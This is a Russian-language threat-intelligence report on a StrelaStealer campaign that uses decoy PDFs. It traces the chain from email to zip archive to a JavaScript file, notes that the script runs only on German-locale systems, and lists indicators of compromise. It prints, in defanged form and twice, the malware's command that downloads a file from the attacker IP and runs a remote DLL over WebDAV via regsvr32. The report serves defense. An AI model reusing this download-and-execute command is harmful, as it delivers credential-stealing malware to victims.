Недавняя цепочка заражения StrelaStealer включает в себя файлы-приманки в формате pdf

Недавняя активность StrelaStealer продолжает использовать серверы WebDAV для размещения вредоносного ПО.

StrelaStealer

С конца января 2025 года мы начали замечать, что в процессе заражения используются ложные PDF-файлы.

По состоянию на понедельник 2025-02-10 сервер WebDAV и C2 по адресу 193.143.1[.]205 по-прежнему активно размещает ложные PDF-файлы и вредоносное ПО StrelaStealer.

Приманка PDF не является вредоносной, но имеет размытое изображение и служит для введения потенциальных жертв в заблуждение.

Файлы .js выполняются только в том случае, если на Windows-хосте жертвы используются следующие языки и локали:

Немецкий (Австрия)
немецкий (Германия)
немецкий (Лихтенштейн)
Немецкий (Люксембург)
немецкий (Швейцария)

Недавняя цепочка заражения

электронное письмо --> вложенный zip-архив --> извлеченный файл JavaScript (.js) --> wscript.exe запускает файл .js при двойном щелчке:

скрипт генерирует команду PowerShell для получения и открытия ложного PDF-документа.
Сценарий также запускает командную строку в фоновом режиме для выполнения библиотеки StelaStealer DLL, размещенной на сервере WebDAV.

cmd /c powershell.exe -Command 
  "Invoke-WebRequest -OutFile %temp%\\invoice.pdf hxxp[:]//193.143.1[.]205/invoice.php" && 
  start %temp%\\invoice.pdf && 
  cmd /c net use \\\\193.143.1[.]205@8888\\davwwwroot\\ && 
  cmd /c regsvr32 /s \\\\193.143.1[.]205@8888\\davwwwroot\\281681957614368.dll

cmd /c powershell.exe -Command

"Invoke-WebRequest -OutFile %temp%\\invoice.pdf hxxp[:]//193.143.1[.]205/invoice.php" &&

start %temp%\\invoice.pdf &&

cmd /c net use \\\\193.143.1[.]205@8888\\davwwwroot\\ &&

cmd /c regsvr32 /s \\\\193.143.1[.]205@8888\\davwwwroot\\281681957614368.dll

Indicators of Compromise

IPv4

193.143.1.205

IPv4 Port Combinations

193.143.1.205:8888

SHA256

0237c0247632a2ea8d80bb1a3398f1ba9b8f7704af70113e8fa0bbe688550ea1
023fe721b61eb902dde8e89cf1d2d9a9a90a9e3016c36836f3f96eb0846e0e4f
0d11f84e614c5394218abcfde06dc0ca4befb4d4527ec38a009e9bd78a0a403c
0e8e0a57a3cc02c8666378463e1bde1697c3e6bb14e5b773f644e06ea05ab41c
18f2f23775a128b26139cf373373890d7165049600af5f3da6776a04c991f82f
2e76869289964a9025f8dc20c9f4ce0c341a7b0305c3906e717c812af4efff88
36d1eeb02cd95376360a2bb64fbd531f57a5ad1e496f1a28f9d6f8d1b30150da
3d90244755ddc949ba4a46ba01dc8157dbe0ffa96aab27a43fca4e2f2f7960ce
3ea9961f6b11e3fd9f09e76819ab7083f1ad924d5fbd543b466c467880e943d4
3fa21cc2a8b3548d82f432e4498b867f774083a879c91056afa0d0b1116d8af3
4adf4847c92046a65f51a2f0886f6c97a27e4fd73e0bf3a6d7778b500f40c4a7
4f512c879ae57917208596543e039012e13588437e106c1986c25428ae6aa58a
526f99634031b5220df204148aaeaf4a105c927a9623eff4e0e6eab2fec470e6
56ddf2bcd35791d353cccb64f2b03b4e30d62fbf64408a53fb081acb229e7bb1
57a98c713f1b54cf2a15f03abd827361ba03f94ce04668558f5a3987a1f47dc6
7e4939b5a3f45a6deca1e52fb1570a41a64eab4100819be1ce277ff05869527d
915c9d78cf65c4be89eda22e5f03d44d6a593bc4be02fa816871d8ee398ca8fa
9f418f7c66d036b02047f0e99a86647e406f97457ba5ff05aa8c6774e2156166
b83bc3ea84a1dfa72e46905e8fe63d8102e67866be40d0f74aa25cba6467765e
b85724ef6d750864422bae530864a6a77c7616d2dc291da74c1fc41e23ece6c3
bd7d9850ab56ea616b6762e736adbfc12809cdfd18525b0eb79712be7317200c
cc773750eff260dc5396f878e3a61f5a79689e0078e8b679b3152f7af027a429
cf7ebeeab3c143444a761b8aff25ee9cf3bb498927004e27cfe33fb7eee75c93
f3677f29dee7338da89321564757caa15ce0c50f85540977b7470bf3a6ca0d2c
fc3518d746cdb3738da976551795b9727619f41f89ac0641533126e2f69b969a